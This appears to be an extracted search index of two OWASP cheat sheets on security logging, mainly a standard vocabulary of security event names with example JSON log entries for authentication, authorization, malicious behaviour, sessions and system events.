As you can see in the image above, at the network level, the processes of saving and downloading logs require opening different network accesses (ports), arrows are highlighted in different colors. Also, saving and downloading are performed by different applications.

Full network segmentation cheat sheet by sergiomarotco: link

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#deployment-and-operation","title":"Deployment and operation","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#release","title":"Release","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#operation","title":"Operation","text":"

Enable processes to detect whether logging has stopped, and to identify tampering or unauthorized access and deletion (see protection below).

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#protection","title":"Protection","text":"

The logging mechanisms and collected event data must be protected from mis-use such as tampering in transit, and unauthorized access, modification and deletion once stored. Logs may contain personal and other sensitive information, or the data may contain information regarding the application's code and logic.

In addition, the collected information in the logs may itself have business value (to competitors, gossip-mongers, journalists and activists) such as allowing the estimate of revenues, or providing performance information about employees.

This data may be held on end devices, at intermediate points, in centralized repositories and in archives and backups.

Consider whether parts of the data may need to be excluded, masked, sanitized, hashed or encrypted during examination or extraction.

At rest:

In transit:

See NIST SP 800-92 Guide to Computer Security Log Management for more guidance.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#monitoring-of-events","title":"Monitoring of events","text":"

The logged event data needs to be available to review and there are processes in place for appropriate monitoring, alerting and reporting:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#disposal-of-logs","title":"Disposal of logs","text":"

Log data, temporary debug logs, and backups/copies/extractions, must not be destroyed before the duration of the required data retention period, and must not be kept beyond this time.

Legal, regulatory and contractual obligations may impact on these periods.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#attacks-on-logs","title":"Attacks on Logs","text":"

Because of their usefulness as a defense, logs may be a target of attacks. See also OWASP Log Injection and CWE-117.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#confidentiality","title":"Confidentiality","text":"

Who should be able to read what? A confidentiality attack enables an unauthorized party to access sensitive information stored in logs.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#integrity","title":"Integrity","text":"

Which information should be modifiable by whom?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#availability","title":"Availability","text":"

What downtime is acceptable?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#accountability","title":"Accountability","text":"

Who is responsible for harm?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html","title":"Application Logging Vocabulary Cheat Sheet","text":"

This document proposes a standard vocabulary for logging security events. The intent is to simplify monitoring and alerting such that, assuming developers trap errors and log them using this vocabulary, monitoring and alerting would be improved by simply keying on these terms.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#overview","title":"Overview","text":"

Each year IBM Security commissions the Ponemon Institute to survey companies around the world for information related to security breaches, mitigation, and the associated costs; the result is called the Cost of a Data Breach Report.

In addition to the millions of dollars lost due to breaches the report finds that the mean time to identify a breach continues to hover around 200 days. Clearly our ability to monitor applications and alert on anomalous behavior would improve our time to identify and mitigate an attack against our applications.

IBM Cost of a Data Breach Study 2020, Fig.34, pg.52, [https://www.ibm.com/security/data-breach]

This logging standard would seek to define specific keywords which, when applied consistently across software, would allow groups to simply monitor for these events terms across all applications and respond quickly in the event of attack.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#assumptions","title":"Assumptions","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#getting-started","title":"Getting Started","text":"

As a reminder, the goal of logging is to be able to alert on specific security events. Of course, the first step to logging these events is good error handling, if you're not trapping the events, you don't have an event to log.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#identifying-events","title":"Identifying Events","text":"

In order to better understand security event logging a good high-level understanding of threat modeling would be helpful, even if it's a simple approach of:

  1. What could go wrong?

  2. Orders: could someone order on behalf of another?

  3. Authentication: could I log in as someone else?
  4. Authorization: could I see someone else' account?

  5. What would happen if it did?

  6. Orders: I've placed an order on behalf of another... to an abandoned warehouse in New Jersey. Oops.

  7. Then I bragged about it on 4Chan.
  8. Then I told the New York Times about it.

  9. Who might intend to do this?

  10. Intentional attacks by hackers.

  11. An employee \"testing\" how things work.
  12. An API coded incorrectly doing things the author did not intend.
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#format","title":"Format","text":"

NOTE: All dates should be logged in ISO 8601 format WITH UTC offset to ensure maximum portability

{\n    \"datetime\": \"2021-01-01T01:01:01-0700\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"AUTHN_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    \"useragent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\",\n    \"source_ip\": \"165.225.50.94\",\n    \"host_ip\": \"10.12.7.9\",\n    \"hostname\": \"portalauth.foobar.com\",\n    \"protocol\": \"https\",\n    \"port\": \"440\",\n    \"request_uri\": \"/api/v2/auth/\",\n    \"request_method\": \"POST\",\n    \"region\": \"AWS-US-WEST-2\",\n    \"geo\": \"USA\"\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#the-vocabulary","title":"The Vocabulary","text":"

What follows are the various event types that should be captured. For each event type there is a prefix like \"authn\" and additional data that should be included for that event.

Portions of the full logging format are included for example, but a complete event log should follow the format above.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authentication-authn","title":"Authentication [AUTHN]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successuserid","title":"authn_login_success[:userid]","text":"

Description All login events should be recorded including success.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successafterfailuseridretries","title":"authn_login_successafterfail[:userid,retries]","text":"

Description The user successfully logged in after previously failing.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_successafterfail:joebob1,2\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_failuserid","title":"authn_login_fail[:userid]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login failed\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_fail_maxuseridmaxlimitint","title":"authn_login_fail_max[:userid,maxlimit(int)]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail_max:joebob1,3\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 reached the login fail limit of 3\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_lockuseridreason","title":"authn_login_lock[:userid,reason]","text":"

Description When the feature exists to lock an account after x retries or other condition, the lock should be logged with relevant data.

Level: WARN

Reasons:

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_lock:joebob1,maxretries\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login locked because maxretries exceeded\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_changeuserid","title":"authn_password_change[:userid]","text":"

Description Every password change should be logged, including the userid that it was for.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has successfully changed their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_change_failuserid","title":"authn_password_change_fail[:userid]","text":"

Description An attempt to change a password that failed. May also trigger other events such as authn_login_lock.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 failed to changing their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_impossible_traveluseridregion1region2","title":"authn_impossible_travel[:userid,region1,region2]","text":"

Description When a user is logged in from one city and suddenly appears in another, too far away to have traveled in a reasonable timeframe, this often indicates a potential account takeover.

Level:: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_impossible_travel:joebob1,US-OR,CN-SH\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 has accessed the application in two distant cities at the same time\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_createduserid-entitlements","title":"authn_token_created[:userid, entitlement(s)]","text":"

Description When a token is created for service access it should be recorded

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_created:app.foobarapi.prod,create,read,update\",\n    \"level\": \"INFO\",\n    \"description\": \"A token has been created for app.foobarapi.prod with create,read,update\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_revokeduseridtokenid","title":"authn_token_revoked[:userid,tokenid]","text":"

Description A token has been revoked for the given account.

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_revoked:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"INFO\",\n    \"description\": \"Token ID: xyz-abc-123-gfk was revoked for user app.foobarapi.prod\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_reuseuseridtokenid","title":"authn_token_reuse[:userid,tokenid]","text":"

Description A previously revoked token was attempted to be reused.

Level:: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_reuse:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User app.foobarapi.prod attempted to use token ID: xyz-abc-123-gfk which was previously revoked\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_deleteappid","title":"authn_token_delete[:appid]","text":"

Description When a token is deleted it should be recorded

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_token_delete:foobarapi\",\n    \"level\": \"WARN\",\n    \"description\": \"The token for foobarapi has been deleted\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authorization-authz","title":"Authorization [AUTHZ]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_failuseridresource","title":"authz_fail[:userid,resource]","text":"

Description An attempt was made to access a resource which was unauthorized

Level:: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_fail:joebob1,resource\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 attempted to access a resource without entitlement\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_changeuseridfromto","title":"authz_change[:userid,from,to]","text":"

Description The user or entity entitlements was changed

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_change:joebob1,user,admin\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 access was changed from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_adminuseridevent","title":"authz_admin[:userid,event]","text":"

Description All activity by privileged users such as admin should be recorded.

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_admin:joebob1,user_privilege_change\",\n    \"level\": \"WARN\",\n    \"description\": \"Administrtator joebob1 has updated privileges of user foobarapi from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excessive-use-excess","title":"Excessive Use [EXCESS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excess_rate_limit_exceededuseridmax","title":"excess_rate_limit_exceeded[userid,max]","text":"

Description Expected service limit ceilings should be established and alerted when exceeded, even if simply for managing costs and scaling.

Level:: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"excess_rate_limit_exceeded:app.foobarapi.prod,100000\",\n    \"level\": \"WARN\",\n    \"description\": \"User app.foobarapi.prod has exceeded max:100000 requests\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#file-upload-upload","title":"File Upload [UPLOAD]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_completeuseridfilenametype","title":"upload_complete[userid,filename,type]","text":"

Description On successful file upload the first step in the validation process is that the upload has completed.

Level:: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_complete:joebob1,user_generated_content.png,PNG\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has uploaded user_generated_content.png\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_storedfilenamefromto","title":"upload_stored[filename,from,to]","text":"

Description One step in good file upload validation is to move/rename the file and when providing the content back to end users, never reference the original filename in the download. This is true both when storing in a filesystem as well as in block storage.

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_stored:user_generated_content.png,kjsdhkrjhwijhsiuhdf000010202002\",\n    \"level\": \"INFO\",\n    \"description\": \"File user_generated_content.png was stored in the database with key abcdefghijk101010101\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_validationfilenamevirusscanimagemagickfailedincompletepassed","title":"upload_validation[filename,(virusscan|imagemagick|...):(FAILED|incomplete|passed)]","text":"

Description All file uploads should have some validation performed, both for correctness (is in fact of file type x), and for safety (does not contain a virus).

Level:: INFO|CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_validation:filename,virusscan:FAILED\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"File user_generated_content.png FAILED virus scan and was purged\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_deleteuseridfileid","title":"upload_delete[userid,fileid]","text":"

Description When a file is deleted for normal reasons it should be recorded.

Level:: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_delete:joebob1,\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has marked file abcdefghijk101010101 for deletion.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input-validation-input","title":"Input Validation [INPUT]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input_validation_failfielduserid","title":"input_validation_fail[:field,userid]","text":"

Description When input validation fails on the server-side it must either be because a) sufficient validation was not provided on the client, or b) client-side validation was bypassed. In either case it's an opportunity for attack and should be mitigated quickly.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"input_validation_fail:date_of_birth,joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 submitted data that failed validation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious-behavior-malicious","title":"Malicious Behavior [MALICIOUS","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_excess_404useridipuseragent","title":"malicious_excess_404:[userid|IP,useragent]","text":"

Description When a user makes numerous requests for files that don't exist it often is an indicator of attempts to \"force-browse\" for files that could exist and is often behavior indicating malicious intent.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_excess404:123.456.789.101,M@l1c10us-Hax0rB0t0-v1\",\n    \"level\": \"WARN\",\n    \"description\": \"A user at 123.456.789.101 has generated a large number of 404 requests.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_extraneoususeridipinputnameuseragent","title":"malicious_extraneous:[userid|IP,inputname,useragent]","text":"

Description When a user submits data to a backend handler that was not expected it can indicate probing for input validation errors. If your backend service receives data it does not handle or have an input for this is an indication of likely malicious abuse.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_extraneous:dr@evil.com,creditcardnum,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User dr@evil.com included field creditcardnum in the request which is not handled by this service.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_attack_tooluseridiptoolnameuseragent","title":"malicious_attack_tool:[userid|IP,toolname,useragent]","text":"

Description When obvious attack tools are identified either by signature or by user agent they should be logged.

TODO: A future version of this standard should link to known attack tools, signatures and user-agent strings. For instance, the tool \"Nikto\" leaves behind its user agent by default with a string like \"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\"

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_attack_tool:127.0.0.1,nikto,Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\",\n    \"level\": \"WARN\",\n    \"description\": \"Attack traffic indicating use of Nikto coming from 127.0.0.1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_corsuseridipuseragentreferer","title":"malicious_cors:[userid|IP,useragent,referer]","text":"

Description When attempts are made from unauthorized origins they should of course be blocked, but also logged whenever possible. Even if we block an illegal cross-origin request the fact that the request is being made could be an indication of attack.

NOTE: Did you know that the word \"referer\" is misspelled in the original HTTP specification? The correct spelling should be \"referrer\" but the original typo persists to this day and is used here intentionally.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_cors:127.0.0.1,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0,attack.evil.com\",\n    \"level\": \"WARN\",\n    \"description\": \"An illegal cross-origin request from 127.0.0.1 was referred from attack.evil.com\"\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_direct_referenceuseridip-useragent","title":"malicious_direct_reference:[userid|IP, useragent]","text":"

Description A common attack against authentication and authorization is to directly access an object without credentials or appropriate access authority. Failing to prevent this flaw used to be one of the OWASP Top Ten called Insecure Direct Object Reference. Assuming you've correctly prevented this attack, logging the attempt is valuable to identify malicious users.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted to access an object to which they are not authorized\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege-changes-privilege","title":"Privilege Changes [PRIVILEGE]","text":"

This section focuses on object privilege changes such as read/write/execute permissions or objects in a database having authorization meta-information changed.

Changes to user/account are covered in the User Management section.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege_permissions_changeduseridfileobjectfromleveltolevel","title":"privilege_permissions_changed:[userid,file|object,fromlevel,tolevel]","text":"

Description Tracking changes to objects to which there are access control restrictions can uncover attempt to escalate privilege on those files by unauthorized users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, /users/admin/some/important/path,0511,0777\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 changed permissions on /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive-data-changes-data","title":"Sensitive Data Changes [DATA]","text":"

It's not necessary to log or alert on changes to all files, but in the case of highly sensitive files or data it is important that we monitor and alert on changes.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_createuseridfileobject","title":"sensitive_create:[userid,file|object]","text":"

Description When a new piece of data is created and marked as sensitive or placed into a directory/table/repository where sensitive data is stored, that creation should be logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_create:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created a new file in /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_readuseridfileobject","title":"sensitive_read:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should be have access logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_read:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 read file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_updateuseridfileobject","title":"sensitive_update:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should be have updates to the data logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_update:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 modified file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_deleteuseridfileobject","title":"sensitive_delete:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have deletions of the data logged and reviewed periodically. The file should not be immediately deleted but marked for deletion and an archive of the file should be maintained according to legal/privacy requirements.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_delete:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 marked file /users/admin/some/important/path for deletion\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence-errors-sequence","title":"Sequence Errors [SEQUENCE]","text":"

Also called a business logic attack, if a specific path is expected through a system and an attempt is made to skip or change the order of that path it could indicate malicious intent.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence_failuserid","title":"sequence_fail:[userid]","text":"

Description When a user reaches a part of the application out of sequence it may indicate intentional abuse of the business logic and should be tracked.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sequence_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has reached a part of the application out of the normal application flow.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session-management-session","title":"Session Management [SESSION]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_createduserid","title":"session_created:[userid]","text":"

Description When a new authenticated session is created that session may be logged and activity monitored.

Level: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_created:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has started a new session\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_reneweduserid","title":"session_renewed:[userid]","text":"

Description When a user is warned of session to be expired/revoked and chooses to extend their session that activity should be logged. Also, if the system in question contains highly confidential data then extending a session may require additional verification.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_renewed:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 was warned of expiring session and extended.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_expireduseridreason","title":"session_expired:[userid,reason]","text":"

Description When a session expires, especially in the case of an authenticated session or with sensitive data, then that session expiry may be logged and clarifying data included. The reason code may be any such as: logout, timeout, revoked, etc. Sessions should never be deleted but rather expired in the case of revocation requirement.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_expired:joebob1,revoked\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 session expired due to administrator revocation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_use_after_expireuserid","title":"session_use_after_expire:[userid]","text":"

Description In the case a user attempts to access systems with an expire session it may be helpful to log, especially if combined with subsequent login failure. This could identify a case where a malicious user is attempting a session hijack or directly accessing another person's machine/browser.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_use_after_expire:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted access after session expired.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#system-events-sys","title":"System Events [SYS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_startupuserid","title":"sys_startup:[userid]","text":"

Description When a system is first started it can be valuable to log the startup, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_startup:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 spawned a new instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_shutdownuserid","title":"sys_shutdown:[userid]","text":"

Description When a system is shut down it can be valuable to log the event, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_shutdown:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 stopped this instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_restartuserid","title":"sys_restart:[userid]","text":"

Description When a system is restarted it can be valuable to log the event, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_restart:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 initiated a restart\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_crashreason","title":"sys_crash[:reason]","text":"

Description If possible to catch an unstable condition resulting in the crash of a system, logging that event could be helpful, especially if the event is triggered by an attack.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_crash:outofmemory,\n    \"level\": \"WARN\",\n    \"description\": \"The system crashed due to Out of Memory error.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_disableduseridmonitor","title":"sys_monitor_disabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are halted and by whom.

Level: WARN

Example:

